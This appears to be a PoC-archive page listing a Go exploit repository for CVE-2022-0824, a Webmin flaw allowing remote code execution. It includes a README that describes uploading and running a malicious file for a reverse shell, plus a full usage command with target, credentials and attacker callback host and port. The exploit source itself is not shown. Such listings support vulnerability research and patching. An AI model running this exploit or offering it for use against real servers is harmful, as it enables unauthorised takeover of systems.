Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-0824 PoC — Improper Access Control to Remote Code Execution in webmin/webmin

Source
https://github.com/pizza-power/golang-webmin-CVE-2022-0824-revshell
Associated Vulnerability
Title:Improper Access Control to Remote Code Execution in webmin/webmin (CVE-2022-0824)
Description:Improper Access Control to Remote Code Execution in GitHub repository webmin/webmin prior to 1.990.
Description
Exploit POC for CVE-2022-0824
Readme
# golang-webmin-CVE-2022-0824-revshell

RCE in Webmin <= 1.984 

CVE-2022-0824 and CVE-2022-0829 

This exploits a BAC vuln in Webmin to upload a malicious file,
change the permissions on the file, and execute the file. The file,
created in the makePayload function, is a reverse shell back to an
attacker controlled server.

## Usage

go run cve-2022-0824.go -t "https://172.16.177.132:10000" -c "username:password" -sl 172.16.177.1:8999 -s 172.16.177.1 -p 4444

t -> target url\
c -> creds for webmin\
sl -> your local server IP and port to host your payload\
s -> callback ip\
p -> callback port

## References
https://www.webmin.com/security.html \
https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/ \
https://nvd.nist.gov/vuln/detail/CVE-2022-0824
File Snapshot

 [4.0K]  /data/pocs/6f17a0736df7a97155d79756a17c01235ee5f530
├── [6.0K]  cve-2022-0824.go
└── [ 767]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →